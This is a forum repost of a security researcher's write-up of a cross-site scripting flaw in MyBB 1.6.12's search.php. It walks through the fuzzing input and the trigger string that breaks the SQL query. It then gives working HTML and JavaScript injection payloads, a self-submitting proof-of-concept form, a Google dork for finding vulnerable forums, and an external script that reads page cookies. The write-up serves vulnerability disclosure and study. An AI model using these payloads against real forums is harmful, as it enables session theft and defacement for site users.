Jump to content
Nytro

MyBB 1.6.12 POST XSS 0day

By Nytro, in Exploituri

Recommended Posts

Nytro Mentor

Nytro

Posted
Posted (edited)

MyBB 1.6.12 POST XSS 0day

This is a weird bug I found in MyBB. I fuzzed the input of the search.php file. This was my input given.

<foo> <h1> <script> alert (bar) () ; // ' " > < prompt \x41 %42 constructor onload

MyBB throws out a SQL error:

SELECT t.tid, t.firstpost FROM mybb_threads t WHERE 1=1         AND t.closed NOT LIKE 'moved|%'   AND (  LOWER(t.subject) LIKE '%<foo> <h1> <script> alert (bar) () ; //%'  LOWER(t.subject) LIKE '%> < prompt \x41 \%42 constructor onload%')

fuzz1.png?w=600&h=395

This made me analyze and reverse this to find the cause. After filtering out this was the correct input which can cause this error.

This part should be constant or’(“\

To reproduce this issue you can add any char value in front on or’(“\ and 2 char values after or’(“\ and you cannot have any spaces in between them.

This will be the skeleton:

[1 char value]or’(“\[2 char values]

Examples:

1or’(“\00

qor’(“\2a

You can have a space like this

qor’(“\ a

SELECT t.tid, t.firstpost FROM mybb_threads t WHERE 1=1         AND t.closed NOT LIKE 'moved|%'   AND (  LOWER(t.subject) LIKE '%qor (%'  LOWER(t.subject) LIKE '%\2a%')

finalerror.png?w=600&h=346

How to Inject JavaScript and HTML?

We can inject HTML + JavaScript but the search.php filters out ‘ “ [] – characters. This is the method you could use inject your payload. If we put our constant in the middle we can inject our payload in front and after it. If we inject it at the beginning of the constant the payload will be stored in this manner.

  [B]<Payload here>[/B]qor’(“\2a

SELECT t.tid, t.firstpost FROM mybb_threads t WHERE 1=1 AND t.closed NOT LIKE 'moved|%'   AND (  LOWER(t.subject) LIKE '%[B]<Payload Here>[/B]qor (%'  LOWER(t.subject) LIKE '%\2a%') For example if we inject a HTML header at the beginning
 [B]<h1>Osanda</h1>[/B]qor’(“\2a

It will look like this inside the source:

SELECT t.tid, t.firstpost FROM mybb_threads t WHERE 1=1 AND t.closed NOT LIKE 'moved|%'   AND (  LOWER(t.subject) LIKE '%[B]<h1>Osanda</h1>[/B]qor (%'  LOWER(t.subject) LIKE '%\2a%')

htmi1.png?w=600&h=439

Now if we try injecting at the end of our payload it will be stored in two places like this in the source.

  qor’(“\2a[B]<Payload Here>[/B]

The payload is thrown out in the SQL error itself.

1064 - You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'LOWER(t.subject) LIKE '%\2a<payload here>%')' at line 3 The second place is inside the query.

SELECT t.tid, t.firstpost FROM mybb_threads t WHERE 1=1         AND t.closed NOT LIKE 'moved|%'   AND (  LOWER(t.subject) LIKE '%qor (%'  LOWER(t.subject) LIKE '%\2a[B]<payload here>%[/B]')

Example:

htmli2.png?w=600&h=521

This would be an example of JavaScript being interpreted <script>alert(/Osanda/)</script>. Notice that our string is converted to lower case characters due to the SQL query.

xss.png?w=600&h=395

Remember this filters out ‘ “ [] — characters. Therefore we can use and external script source for performing further client side attacks.

Proof of Concept

<html>
<!-- 
Exploit-Title: MyBB 1.6.12 POST XSS 0day
Google-Dork: inurl:index.php intext:Powered By MyBB
Date: Februrary 2nd of 2014
Bug Discovered and Exploit Author: Osanda Malith Jayathissa
Vendor Homepage: http://www.mybb.com
Software Link: http://resources.mybb.com/downloads/mybb_1612.zip
Version: 1.6.12 (older versions might be vulnerbale)
Tested on: Windows 8 64-bit
Original write-up: http://osandamalith.wordpress.com/2014/02/02/mybb-1-6-12-post-xss-0day 

-->
  <body>
    <form name="exploit" action="http://localhost/mybb_1612/Upload/search.php" method="POST">
      <input type="hidden" name="action" value="do_search" />
      <input type="hidden" name="keywords" 

value="qor'("\2a<script>alert(/XSS/)</script>

" />
     <script>document.exploit.submit(); </script>
    </form>
  </body>
</html>

POC Video

You could do something creative like this in an external source to view the domain, cookies and exploitation beyond the filters. You can define your source like this.

<script src=poc />qor'("\2a</script>

This will be containing in the poc file.

document.write('<h1>MyBB XSS 0day</h1><br/><h2>Domain: ' + document.domain + '</h2><br/> <h3>  Osanda and HR</h3><strong>User Cookies: </strong><br/>' + document.cookie);  alert('XSS by Osanda & HR');

external-xss.png?w=600&h=513

Thanks to Hood3dRob1n for this idea icon_smile.gif?m=1129645325g

I have no idea to inject SQL in this bug. You may give it a try and see.

Sursa: MyBB 1.6.12 POST XSS 0day | Blog of Osanda Malith

Edited by Nytro
  • Downvote 1
Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

×
Go to topic listing
×
×
  • Create New...